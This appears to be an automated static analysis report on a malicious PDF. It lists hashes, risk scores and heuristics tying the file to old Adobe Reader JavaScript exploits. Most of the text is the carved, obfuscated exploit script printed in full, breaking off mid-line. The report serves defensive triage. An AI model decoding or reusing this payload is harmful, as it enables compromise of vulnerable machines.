Malicious PDF — malware analysis report

Static analysis result for SHA-256 fb726760997599ad…

MALICIOUS

PDF

6.6 KB First seen: 2026-05-10
MD5: 41d997379a9ed4156a9e9de15114380a SHA-1: 7a9366c04c2b23745323cbfede5b34109e46e117 SHA-256: fb726760997599adf2ca72489b3f8ba55915b80efa9f039902962c92d2741389
476 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream, specifically 'javascript_obj0039_000.js', appears to be obfuscated and is likely responsible for downloading and executing a secondary payload. The 'legacy_pdfkit_stage_000.js' is a deobfuscated version of the script. The presence of String.fromCharCode further suggests obfuscation techniques common in malicious scripts.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    i6M5222S="C4HmQ5j=[70,85,78,67,84,73,79,78,0,70,73,88,127,73,84,8,89,65,82,8"; i6M5222S+= "3,80,12,76,69,78,9,91,87,72,73,76,69,8,89,65,82,83,80,14,"; i6M5222S+= "76,69,78,71,84,72,10,18,28,76,69,78,9,91,89,65,82,83,80,1"; i6M5222S+= "1,29,89,65,82,83,80,27,93,89,65,82,83,80,29,89,65,82,83,8"; i6M5222S+= "0,14,83,85,66,83,84,82,73,78,71,8,16,12,76,69,78,15,18,9,"; i6M5222S+= "27,82,69,84,85,82,78,0,89,65,82,83,80,27,93,45,42,70,85,7"; i6M5222S+= "8,67,84,73,79,78,0,78,69,87,80,76,65,89,69,82,8,9 …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0039_000.js pdf-javascript-stream PDF /JS object 39 at offset 0x16F 20420 bytes
SHA-256: 3b3ae952aef55af3da3e023d001f3e76f49a9ac394a7b4f19ca5dab89331a44e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
i6M5222S="C4HmQ5j=[70,85,78,67,84,73,79,78,0,70,73,88,127,73,84,8,89,65,82,8"; i6M5222S+= "3,80,12,76,69,78,9,91,87,72,73,76,69,8,89,65,82,83,80,14,"; i6M5222S+= "76,69,78,71,84,72,10,18,28,76,69,78,9,91,89,65,82,83,80,1"; i6M5222S+= "1,29,89,65,82,83,80,27,93,89,65,82,83,80,29,89,65,82,83,8"; i6M5222S+= "0,14,83,85,66,83,84,82,73,78,71,8,16,12,76,69,78,15,18,9,"; i6M5222S+= "27,82,69,84,85,82,78,0,89,65,82,83,80,27,93,45,42,70,85,7"; i6M5222S+= "8,67,84,73,79,78,0,78,69,87,80,76,65,89,69,82,8,9,91,45,4"; i6M5222S+= "2,86,65,82,0,83,72,69,76,76,67,79,68,69,0,29,0,85,78,69,8"; i6M5222S+= "3,67,65,80,69,8,2,5,85,17,17,101,98,5,85,20,98,21,98,5,85"; i6M5222S+= ",99,25,19,19,5,85,24,17,22,22,5,85,97,102,99,25,5,85,24,1"; i6M5222S+= "6,16,17,5,85,16,98,19,20,5,85,101,18,97,22,5,85,101,98,10"; i6M5222S+= "2,97,5,85,101,24,16,21,5,85,102,102,101,97,5,85,102,102,1"; i6M5222S+= "02,102,5,85,23,99,20,102,5,85,97,22,97,22,5,85,102,25,97,"; i6M5222S+= "22,5,85,16,23,99,18,5,85,97,22,25,22,5,85,97,22,97,22,5,8"; i6M5222S+= "5,101,22,18,100,5,85,18,100,97,97,5,85,98,97,100,22,5,85,"; i6M5222S+= "18,100,16,98,5,85,97,101,99,101,5,85,100,22,18,100,5,85,1"; i6M5222S+= "8,100,24,22,5,85,18,22,97,22,5,85,99,100,25,24,5,85,21,21"; i6M5222S+= ",100,19,5,85,101,16,101,16,5,85,25,24,18,22,5,85,100,19,9"; i6M5222S+= "9,19,5,85,101,16,20,97,5,85,18,22,101,16,5,85,100,20,25,2"; i6M5222S+= "4,5,85,21,17,100,19,5,85,101,16,101,16,5,85,25,24,18,22,5"; i6M5222S+= ",85,100,19,99,24,5,85,18,100,21,22,5,85,99,99,21,17,5,85,"; i6M5222S+= "102,102,97,21,5,85,102,100,20,101,5,85,97,22,97,22,5,85,2"; i6M5222S+= "0,20,97,22,5,85,99,101,21,102,5,85,99,24,99,25,5,85,97,22"; i6M5222S+= ",97,22,5,85,100,19,99,101,5,85,99,97,100,20,5,85,102,18,9"; i6M5222S+= "9,98,5,85,98,16,21,25,5,85,20,101,18,100,5,85,101,19,20,1"; i6M5222S+= "01,5,85,97,22,97,22,5,85,99,101,97,22,5,85,25,21,99,97,5,"; i6M5222S+= "85,97,22,25,20,5,85,100,21,99,101,5,85,99,19,99,101,5,85,"; i6M5222S+= "102,18,99,97,5,85,98,16,21,25,5,85,20,101,18,100,5,85,25,"; i6M5222S+= "23,20,101,5,85,97,22,97,22,5,85,18,21,97,22,5,85,101,22,2"; i6M5222S+= "0,97,5,85,23,97,18,100,5,85,99,99,102,21,5,85,21,25,101,2"; i6M5222S+= "2,5,85,97,18,102,16,5,85,97,18,22,17,5,85,99,23,97,21,5,8"; i6M5222S+= "5,99,19,24,24,5,85,99,16,100,101,5,85,101,18,22,17,5,85,9"; i6M5222S+= "7,18,97,21,5,85,97,22,99,19,5,85,22,22,25,21,5,85,102,22,"; i6M5222S+= "102,22,5,85,102,17,102,21,5,85,21,25,102,22,5,85,97,97,10"; i6M5222S+= "2,16,5,85,23,97,18,100,5,85,102,22,102,22,5,85,102,21,102"; i6M5222S+= ",22,5,85,102,22,102,22,5,85,102,16,21,25,5,85,21,25,98,22"; i6M5222S+= ",5,85,97,101,102,16,5,85,102,16,102,23,5,85,100,19,18,100"; i6M5222S+= ",5,85,18,100,25,97,5,85,24,24,100,18,5,85,97,21,100,101,5"; i6M5222S+= ",85,102,16,21,19,5,85,100,16,18,100,5,85,97,21,24,22,5,85"; i6M5222S+= ",25,21,21,19,5,85,101,102,22,102,5,85,16,98,101,23,5,85,2"; i6M5222S+= "2,19,97,21,5,85,23,100,25,21,5,85,17,24,97,25,5,85,25,99,"; i6M5222S+= "98,22,5,85,100,18,23,16,5,85,22,23,97,101,5,85,97,98,22,1"; i6M5222S+= "00,5,85,23,99,97,21,5,85,20,100,101,22,5,85,25,100,21,23,"; i6M5222S+= "5,85,100,19,98,25,5,85,102,24,20,17,5,85,102,24,18,100,5,"; i6M5222S+= "85,97,21,24,18,5,85,99,16,23,98,5,85,97,97,18,100,5,85,18"; i6M5222S+= ",100,101,100,5,85,98,97,102,24,5,85,23,98,97,21,5,85,97,1"; i6M5222S+= "8,18,100,5,85,97,21,18,100,5,85,16,100,22,19,5,85,102,102"; i6M5222S+= ",102,24,5,85,20,101,22,21,5,85,21,25,24,23,5,85,21,25,21,"; i6M5222S+= "25,5,85,101,24,18,24,5,85,20,97,97,24,5,85,22,99,25,21,5,"; i6M5222S+= "85,102,100,18,99,5,85,23,101,100,24,5,85,100,21,20,20,5,8"; i6M5222S+= "5,98,99,25,16,5,85,100,22,24,25,5,85,17,100,102,24,5,85,9"; i6M5222S+= "8,100,20,23,5,85,100,18,99,101,5,85,100,22,100,18,5,85,24"; i6M5222S+= ",25,25,99,5,85,100,23,24,25,5,85,100,21,100,22,5,85,25,20"; i6M5222S+= ",99,100,5,85,100,20,24,24,5,85,24,25,100,19,5,85,25,22,10"; i6M5222S+= "0,21,5,85,25,17,100,102,5,85,100,23,100,101,5,85,24,25,25"; i6M5222S+= ",20,5,85,99,102,99,100,5,85,99,21,100,102,5,85,100,21,100"; i6M5222S+= ",23,5,85,24,24,25,22,5,85,99,101,100,22,5,85,25,25,100,22"; i6M5222S+= ",5,85,100,22,100,21,5,85,25,98,99,97,5,85,99,18,100,22,5,"; i6M5222S+= "85,102,25,99,16,5,85,99,19,99,24,5,85,102,22,100,17,5,85,"; i6M5222S+= "99,23,99,97,5,85,99,19,100,102,5,85,24,16,100,20,5,85,99,"; i6M5222S+= "101,99,16,5,85,97,22,25,98,2,9,27,45,42,86,65,82,0,66,76,"; i6M5222S+= "79,67,75,0,29,0,85,78,69,83,67,65,80,69,8,2,5,85,16,67,16"; i6M5222S+= ",67,5,85,16,67,16,67,2,9,27,45,42,86,65,82,0,103,100,65,7"; i6M5222S+= "1,65,99,85,89,110,70,114,115,102,90,65,115,122,108,111,0,"; i6M5222S+= "29,0,85,78,69,83,67,65,80,69,8,2,5,85,16,67,16,67,5,85,16"; i6M5222S+= ",67,16,67,5,85,16,67,16,67,5,85,16,67,16,67,5,85,16,67,16"; i6M5222S+= ",67,5,85,16,67,16,67,5,85,16,67,16,67,5,85,16,67,16,67,5,"; i6M5222S+= "85,21,17,20,69,5,85,20,24,22,21,5,85,20,24,20,20,5,85,23,"; i6M5222S+= "18,20,70,5,85,20,65,22,69,5,85,22,68,20,19,5,85,20,66,21,"; i6M5222S+= "17,5,85,20,66,23,25,5,85,23,17,21,22,5,85,20,68,20,17,5,8"; i6M5222S+= "5,21,25,20,20,5,85,21,25,22,66,5,85,23,25,23,25,5,85,22,1"; i6M5222S+= "8,21,65,5,85,22,18,22,70,5,85,23,65,22,69,5,85,22,19,20,6"; i6M5222S+= "9,5,85,20,65,20,68,5,85,22,19,20,17,5,85,22,18,21,19,5,85"; i6M5222S+= ",20,17,21,20,5,85,21,22,23,16,5,85,21,21,20,19,5,85,20,18"; i6M5222S+= ",23,19,5,85,20,67,21,17,5,85,21,23,22,68,5,85,21,23,23,18"; i6M5222S+= ",5,85,21,22,23,16,2,9,27,45,42,87,72,73,76,69,8,66,76,79,"; i6M5222S+= "67,75,14,76,69,78,71,84,72,0,28,29,0,19,18,23,22,24,9,0,6"; i6M5222S+= "6,76,79,67,75,11,29,66,76,79,67,75,27,45,42,66,76,79,67,7"; i6M5222S+= "5,29,66,76,79,67,75,14,83,85,66,83,84,82,73,78,71,8,16,12"; i6M5222S+= ",19,18,23,22,24,0,13,0,83,72,69,76,76,67,79,68,69,14,76,6"; i6M5222S+= "9,78,71,84,72,9,27,45,42,77,69,77,79,82,89,29,78,69,87,0,"; i6M5222S+= "97,82,82,65,89,8,9,27,70,79,82,8,73,29,16,27,73,28,16,88,"; i6M5222S+= "18,16,16,16,27,73,11,11,9,0,91,77,69,77,79,82,89,123,73,1"; i6M5222S+= "25,29,0,66,76,79,67,75,0,11,0,83,72,69,76,76,67,79,68,69,"; i6M5222S+= "27,93,45,42,85,84,73,76,14,80,82,73,78,84,68,8,2,82,76,80"; i6M5222S+= ",112,80,74,116,120,120,105,78,67,117,72,87,65,71,99,90,67"; i6M5222S+= ",85,104,70,77,75,90,111,66,98,115,122,100,103,110,68,99,2"; i6M5222S+= ",12,0,78,69,87,0,100,65,84,69,8,9,9,27,45,42,85,84,73,76,"; i6M5222S+= "14,80,82,73,78,84,68,8,2,115,79,84,115,88,110,113,86,109,"; i6M5222S+= "81,107,110,74,106,75,105,120,73,79,107,76,77,70,122,121,7"; i6M5222S+= "0,77,73,112,103,71,103,110,110,107,78,2,12,0,78,69,87,0,1"; i6M5222S+= "00,65,84,69,8,9,9,27,45,42,84,82,89,0,91,84,72,73,83,14,7"; i6M5222S+= "7,69,68,73,65,14,78,69,87,112,76,65,89,69,82,8,78,85,76,7"; i6M5222S+= "6,9,27,93,0,67,65,84,67,72,8,69,9,0,91,93,45,42,85,84,73,"; i6M5222S+= "76,14,80,82,73,78,84,68,8,103,100,65,71,65,99,85,89,110,7"; i6M5222S+= "0,114,115,102,90,65,115,122,108,111,12,0,78,69,87,0,100,6"; i6M5222S+= "5,84,69,8,9,9,27,93,45,42,45,42,70,85,78,67,84,73,79,78,0"; i6M5222S+= ",67,79,76,76,65,66,127,69,77,65,73,76,8,9,91,86,65,82,0,8"; i6M5222S+= "3,72,69,76,76,67,79,68,69,29,85,78,69,83,67,65,80,69,8,2,"; i6M5222S+= "5,85,17,17,101,98,5,85,20,98,21,98,5,85,99,25,19,19,5,85,"; i6M5222S+= "24,17,22,22,5,85,97,102,99,25,5,85,24,16,16,17,5,85,16,98"; i6M5222S+= ",19,20,5,85,101,18,97,22,5,85,101,98,102,97,5,85,101,24,1"; i6M5222S+= "6,21,5,85,102,102,101,97,5,85,102,102,102,102,5,85,23,99,"; i6M5222S+= "20,102,5,85,97,22,97,22,5,85,102,25,97,22,5,85,16,23,99,1"; i6M5222S+= "8,5,85,97,22,25,22,5,85,97,22,97,22,5,85,101,22,18,100,5,"; i6M5222S+= "85,18,100,97,97,5,85,98,97,100,22,5,85,18,100,16,98,5,85,"; i6M5222S+= "97,101,99,101,5,85,100,22,18,100,5,85,18,100,24,22,5,85,1"; i6M5222S+= "8,22,97,22,5,85,99,100,25,24,5,85,21,21,100,19,5,85,101,1"; i6M5222S+= "6,101,16,5,85,25,24,18,22,5,85,100,19,99,19,5,85,101,16,2"; i6M5222S+= "0,97,5,85,18,22,101,16,5,85,100,20,25,24,5,85,21,17,100,1"; i6M5222S+= "9,5,85,101,16,101,16,5,85,25,24,18,22,5,85,100,19,99,24,5"; i6M5222S+= ",85,18,100,21,22,5,85,99,99,21,17,5,85,102,102,97,21,5,85"; i6M5222S+= ",102,100,20,101,5,85,97,22,97,22,5,85,20,20,97,22,5,85,99"; i6M5222S+= ",101,21,102,5,85,99,24,99,25,5,85,97,22,97,22,5,85,100,19"; i6M5222S+= ",99,101,5,85,99,97,100,20,5,85,102,18,99,98,5,85,98,16,21"; i6M5222S+= ",25,5,85,20,101,18,100,5,85,101,19,20,101,5,85,97,22,97,2"; i6M5222S+= "2,5,85,99,101,97,22,5,85,25,21,99,97,5,85,97,22,25,20,5,8"; i6M5222S+= "5,100,21,99,101,5,85,99,19,99,101,5,85,102,18,99,97,5,85,"; i6M5222S+= "98,16,21,25,5,85,20,101,18,100,5,85,25,23,20,101,5,85,97,"; i6M5222S+= "22,97,22,5,85,18,21,97,22,5,85,101,22,20,97,5,85,23,97,18"; i6M5222S+= ",100,5,85,99,99,102,21,5,85,21,25,101,22,5,85,97,18,102,1"; i6M5222S+= "6,5,85,97,18,22,17,5,85,99,23,97,21,5,85,99,19,24,24,5,85"; i6M5222S+= ",99,16,100,101,5,85,101,18,22,17,5,85,97,18,97,21,5,85,97"; i6M5222S+= ",22,99,19,5,85,22,22,25,21,5,85,102,22,102,22,5,85,102,17"; i6M5222S+= ",102,21,5,85,21,25,102,22,5,85,97,97,102,16,5,85,23,97,18"; i6M5222S+= ",100,5,85,102,22,102,22,5,85,102,21,102,22,5,85,102,22,10"; i6M5222S+= "2,22,5,85,102,16,21,25,5,85,21,25,98,22,5,85,97,101,102,1"; i6M5222S+= "6,5,85,102,16,102,23,5,85,100,19,18,100,5,85,18,100,25,97"; i6M5222S+= ",5,85,24,24,100,18,5,85,97,21,100,101,5,85,102,16,21,19,5"; i6M5222S+= ",85,100,16,18,100,5,85,97,21,24,22,5,85,25,21,21,19,5,85,"; i6M5222S+= "101,102,22,102,5,85,16,98,101,23,5,85,22,19,97,21,5,85,23"; i6M5222S+= ",100,25,21,5,85,17,24,97,25,5,85,25,99,98,22,5,85,100,18,"; i6M5222S+= "23,16,5,85,22,23,97,101,5,85,97,98,22,100,5,85,23,99,97,2"; i6M5222S+= "1,5,85,20,100,101,22,5,85,25,100,21,23,5,85,100,19,98,25,"; i6M5222S+= "5,85,102,24,20,17,5,85,102,24,18,100,5,85,97,21,24,18,5,8"; i6M5222S+= "5,99,16,23,98,5,85,97,97,18,100,5,85,18,100,101,100,5,85,"; i6M5222S+= "98,97,102,24,5,85,23,98,97,21,5,85,97,18,18,100,5,85,97,2"; i6M5222S+= "1,18,100,5,85,16,100,22,19,5,85,102,102,102,24,5,85,20,10"; i6M5222S+= "1,22,21,5,85,21,25,24,23,5,85,21,25,21,25,5,85,101,24,18,"; i6M5222S+= "24,5,85,20,97,97,24,5,85,22,99,25,21,5,85,102,100,18,99,5"; i6M5222S+= ",85,23,101,100,24,5,85,100,21,20,20,5,85,98,99,25,16,5,85"; i6M5222S+= ",100,22,24,25,5,85,17,100,102,24,5,85,98,100,20,23,5,85,1"; i6M5222S+= "00,18,99,101,5,85,100,22,100,18,5,85,24,25,25,99,5,85,100"; i6M5222S+= ",23,24,25,5,85,100,21,100,22,5,85,25,20,99,100,5,85,100,2"; i6M5222S+= "0,24,24,5,85,24,25,100,19,5,85,25,22,100,21,5,85,25,17,10"; i6M5222S+= "0,102,5,85,100,23,100,101,5,85,24,25,25,20,5,85,99,102,99"; i6M5222S+= ",100,5,85,99,21,100,102,5,85,100,21,100,23,5,85,24,24,25,"; i6M5222S+= "22,5,85,99,101,100,22,5,85,25,25,100,22,5,85,100,22,100,2"; i6M5222S+= "1,5,85,25,98,99,97,5,85,99,18,100,22,5,85,102,25,99,16,5,"; i6M5222S+= "85,99,98,99,19,5,85,99,102,99,23,5,85,24,16,99,97,5,85,99"; i6M5222S+= ",101,99,16,5,85,97,22,25,98,2,9,27,86,65,82,0,77,69,77,12"; i6M5222S+= "7,65,82,82,65,89,29,78,69,87,0,97,82,82,65,89,8,9,27,86,6"; i6M5222S+= "5,82,0,67,67,29,16,88,16,67,16,67,16,67,16,67,27,86,65,82"; i6M5222S+= ",0,65,68,68,82,29,16,88,20,16,16,16,16,16,27,86,65,82,0,8"; i6M5222S+= "3,67,127,76,69,78,29,83,72,69,76,76,67,79,68,69,14,76,69,"; i6M5222S+= "78,71,84,72,10,18,27,86,65,82,0,76,69,78,29,65,68,68,82,1"; i6M5222S+= "3,8,83,67,127,76,69,78,11,16,88,19,24,9,27,86,65,82,0,89,"; i6M5222S+= "65,82,83,80,29,85,78,69,83,67,65,80,69,8,2,5,85,25,16,25,"; i6M5222S+= "16,5,85,25,16,25,16,2,9,27,89,65,82,83,80,29,70,73,88,127"; i6M5222S+= ",73,84,8,89,65,82,83,80,12,76,69,78,9,27,86,65,82,0,67,79"; i6M5222S+= ",85,78,84,18,29,8,67,67,13,16,88,20,16,16,16,16,16,9,15,6"; i6M5222S+= "5,68,68,82,27,70,79,82,8,86,65,82,0,67,79,85,78,84,29,16,"; i6M5222S+= "27,67,79,85,78,84,28,67,79,85,78,84,18,27,67,79,85,78,84,"; i6M5222S+= "11,11,9,91,77,69,77,127,65,82,82,65,89,123,67,79,85,78,84"; i6M5222S+= ",125,29,89,65,82,83,80,11,83,72,69,76,76,67,79,68,69,27,9"; i6M5222S+= "3,45,42,86,65,82,0,79,86,69,82,70,76,79,87,29,85,78,69,83"; i6M5222S+= ",67,65,80,69,8,2,5,85,16,67,16,67,5,85,16,67,16,67,2,9,27"; i6M5222S+= ",87,72,73,76,69,8,79,86,69,82,70,76,79,87,14,76,69,78,71,"; i6M5222S+= "84,72,28,20,20,25,21,18,9,91,79,86,69,82,70,76,79,87,11,2"; i6M5222S+= "9,79,86,69,82,70,76,79,87,27,93,45,42,84,72,73,83,14,67,7"; i6M5222S+= "9,76,76,65,66,115,84,79,82,69,29,99,79,76,76,65,66,14,67,"; i6M5222S+= "79,76,76,69,67,84,101,77,65,73,76,105,78,70,79,8,91,83,85"; i6M5222S+= ",66,74,26,2,2,12,77,83,71,26,79,86,69,82,70,76,79,87,93,9"; i6M5222S+= ",27,93,45,42,45,42,70,85,78,67,84,73,79,78,0,67,79,76,76,"; i6M5222S+= "65,66,127,71,69,84,73,67,79,78,8,9,91,73,70,8,65,80,80,14"; i6M5222S+= ",68,79,67,14,99,79,76,76,65,66,14,71,69,84,105,67,79,78,9"; i6M5222S+= ",91,86,65,82,0,65,82,82,89,29,78,69,87,0,97,82,82,65,89,8"; i6M5222S+= ",9,27,86,65,82,0,86,86,80,69,84,72,89,65,29,85,78,69,83,6"; i6M5222S+= "7,65,80,69,8,2,5,85,17,17,101,98,5,85,20,98,21,98,5,85,99"; i6M5222S+= ",25,19,19,5,85,24,17,22,22,5,85,97,102,99,25,5,85,24,16,1"; i6M5222S+= "6,17,5,85,16,98,19,20,5,85,101,18,97,22,5,85,101,98,102,9"; i6M5222S+= "7,5,85,101,24,16,21,5,85,102,102,101,97,5,85,102,102,102,"; i6M5222S+= "102,5,85,23,99,20,102,5,85,97,22,97,22,5,85,102,25,97,22,"; i6M5222S+= "5,85,16,23,99,18,5,85,97,22,25,22,5,85,97,22,97,22,5,85,1"; i6M5222S+= "01,22,18,100,5,85,18,100,97,97,5,85,98,97,100,22,5,85,18,"; i6M5222S+= "100,16,98,5,85,97,101,99,101,5,85,100,22,18,100,5,85,18,1"; i6M5222S+= "00,24,22,5,85,18,22,97,22,5,85,99,100,25,24,5,85,21,21,10"; i6M5222S+= "0,19,5,85,101,16,101,16,5,85,25,24,18,22,5,85,100,19,99,1"; i6M5222S+= "9,5,85,101,16,20,97,5,85,18,22,101,16,5,85,100,20,25,24,5"; i6M5222S+= ",85,21,17,100,19,5,85,101,16,101,16,5,85,25,24,18,22,5,85"; i6M5222S+= ",100,19,99,24,5,85,18,100,21,22,5,85,99,99,21,17,5,85,102"; i6M5222S+= ",102,97,21,5,85,102,100,20,101,5,85,97,22,97,22,5,85,20,2"; i6M5222S+= "0,97,22,5,85,99,101,21,102,5,85,99,24,99,25,5,85,97,22,97"; i6M5222S+= ",22,5,85,100,19,99,101,5,85,99,97,100,20,5,85,102,18,99,9"; i6M5222S+= "8,5,85,98,16,21,25,5,85,20,101,18,100,5,85,101,19,20,101,"; i6M5222S+= "5,85,97,22,97,22,5,85,99,101,97,22,5,85,25,21,99,97,5,85,"; i6M5222S+= "97,22,25,20,5,85,100,21,99,101,5,85,99,19,99,101,5,85,102"; i6M5222S+= ",18,99,97,5,85,98,16,21,25,5,85,20,101,18,100,5,85,25,23,"; i6M5222S+= "20,101,5,85,97,22,97,22,5,85,18,21,97,22,5,85,101,22,20,9"; i6M5222S+= "7,5,85,23,97,18,100,5,85,99,99,102,21,5,85,21,25,101,22,5"; i6M5222S+= ",85,97,18,102,16,5,85,97,18,22,17,5,85,99,23,97,21,5,85,9"; i6M5222S+= "9,19,24,24,5,85,99,16,100,101,5,85,101,18,22,17,5,85,97,1"; i6M5222S+= "8,97,21,5,85,97,22,99,19,5,85,22,22,25,21,5,85,102,22,102"; i6M5222S+= ",22,5,85,102,17,102,21,5,85,21,25,102,22,5,85,97,97,102,1"; i6M5222S+= "6,5,85,23,97,18,100,5,85,102,22,102,22,5,85,102,21,102,22"; i6M5222S+= ",5,85,102,22,102,22,5,85,102,16,21,25,5,85,21,25,98,22,5,"; i6M5222S+= "85,97,101,102,16,5,85,102,16,102,23,5,85,100,19,18,100,5,"; i6M5222S+= "85,18,100,25,97,5,85,24,24,100,18,5,85,97,21,100,101,5,85"; i6M5222S+= ",102,16,21,19,5,85,100,16,18,100,5,85,97,21,24,22,5,85,25"; i6M5222S+= ",21,21,19,5,85,101,102,22,102,5,85,16,98,101,23,5,85,22,1"; i6M5222S+= "9,97,21,5,85,23,100,25,21,5,85,17,24,97,25,5,85,25,99,98,"; i6M5222S+= "22,5,85,100,18,23,16,5,85,22,23,97,101,5,85,97,98,22,100,"; i6M5222S+= "5,85,23,99,97,21,5,85,20,100,101,22,5,85,25,100,21,23,5,8"; i6M5222S+= "5,100,19,98,25,5,85,102,24,20,17,5,85,102,24,18,100,5,85,"; i6M5222S+= "97,21,24,18,5,85,99,16,23,98,5,85,97,97,18,100,5,85,18,10"; i6M5222S+= "0,101,100,5,85,98,97,102,24,5,85,23,98,97,21,5,85,97,18,1"; i6M5222S+= "8,100,5,85,97,21,18,100,5,85,16,100,22,19,5,85,102,102,10"; i6M5222S+= "2,24,5,85,20,101,22,21,5,85,21,25,24,23,5,85,21,25,21,25,"; i6M5222S+= "5,85,101,24,18,24,5,85,20,97,97,24,5,85,22,99,25,21,5,85,"; i6M5222S+= "102,100,18,99,5,85,23,101,100,24,5,85,100,21,20,20,5,85,9"; i6M5222S+= "8,99,25,16,5,85,100,22,24,25,5,85,17,100,102,24,5,85,98,1"; i6M5222S+= "00,20,23,5,85,100,18,99,101,5,85,100,22,100,18,5,85,24,25"; i6M5222S+= ",25,99,5,85,100,23,24,25,5,85,100,21,100,22,5,85,25,20,99"; i6M5222S+= ",100,5,85,100,20,24,24,5,85,24,25,100,19,5,85,25,22,100,2"; i6M5222S+= "1,5,85,25,17,100,102,5,85,100,23,100,101,5,85,24,25,25,20"; i6M5222S+= ",5,85,99,102,99,100,5,85,99,21,100,102,5,85,100,21,100,23"; i6M5222S+= ",5,85,24,24,25,22,5,85,99,101,100,22,5,85,25,25,100,22,5,"; i6M5222S+= "85,100,22,100,21,5,85,25,98,99,97,5,85,99,18,100,22,5,85,"; i6M5222S+= "102,25,99,16,5,85,99,19,99,17,5,85,99,102,100,18,5,85,99,"; i6M5222S+= "25,99,21,5,85,24,16,99,24,5,85,99,101,99,16,5,85,97,22,25"; i6M5222S+= ",98,2,9,27,86,65,82,0,72,119,81,21,16,16,99,110,29,86,86,"; i6M5222S+= "80,69,84,72,89,65,14,76,69,78,71,84,72,10,18,27,86,65,82,"; i6M5222S+= "0,76,69,78,29,16,88,20,16,16,16,16,16,13,8,72,119,81,21,1"; i6M5222S+= "6,16,99,110,11,16,88,19,24,9,27,86,65,82,0,89,65,82,83,80"; i6M5222S+= ",29,85,78,69,83,67,65,80,69,8,2,5,85,25,16,25,16,5,85,25,"; i6M5222S+= "16,25,16,2,9,27,89,65,82,83,80,29,70,73,88,127,73,84,8,89"; i6M5222S+= ",65,82,83,80,12,76,69,78,9,27,86,65,82,0,80,21,97,74,107,"; i6M5222S+= "22,21,70,29,8,16,88,16,67,16,67,16,67,16,67,13,16,88,20,1"; i6M5222S+= "6,16,16,16,16,9,15,16,88,20,16,16,16,16,16,27,70,79,82,8,"; i6M5222S+= "86,65,82,0,86,81,67,113,100,25,22,89,29,16,27,86,81,67,11"; i6M5222S+= "3,100,25,22,89,28,80,21,97,74,107,22,21,70,27,86,81,67,11"; i6M5222S+= "3,100,25,22,89,11,11,9,91,65,82,82,89,123,86,81,67,113,10"; i6M5222S+= "0,25,22,89,125,29,89,65,82,83,80,11,86,86,80,69,84,72,89,"; i6M5222S+= "65,27,93,45,42,86,65,82,0,84,117,109,72,110,66,103,87,29,"; i6M5222S+= "85,78,69,83,67,65,80,69,8,2,5,16,25,2,9,27,87,72,73,76,69"; i6M5222S+= ",8,84,117,109,72,110,66,103,87,14,76,69,78,71,84,72,28,16"; i6M5222S+= ",88,20,16,16,16,9,91,84,117,109,72,110,66,103,87,11,29,84"; i6M5222S+= ",117,109,72,110,66,103,87,27,93,45,42,84,117,109,72,110,6"; i6M5222S+= "6,103,87,29,2,110,14,2,11,84,117,109,72,110,66,103,87,27,"; i6M5222S+= "65,80,80,14,68,79,67,14,99,79,76,76,65,66,14,71,69,84,105"; i6M5222S+= ",67,79,78,8,84,117,109,72,110,66,103,87,9,27,93,93,45,42,"; i6M5222S+= "45,42,70,85,78,67,84,73,79,78,0,80,68,70,127,67,72,69,67,"; i6M5222S+= "75,127,86,69,82,83,8,9,91,45,42,86,65,82,0,86,69,82,83,73"; i6M5222S+= ",79,78,29,65,80,80,14,86,73,69,87,69,82,118,69,82,83,73,7"; i6M5222S+= "9,78,14,84,79,115,84,82,73,78,71,8,9,27,45,42,86,69,82,83"; i6M5222S+= ",73,79,78,29,86,69,82,83,73,79,78,14,82,69,80,76,65,67,69"; i6M5222S+= ",8,15,124,100,15,71,12,7,7,9,27,45,42,86,65,82,0,86,69,82"; i6M5222S+= ",127,65,82,82,65,89,29,78,69,87,0,97,82,82,65,89,8,86,69,"; i6M5222S+= 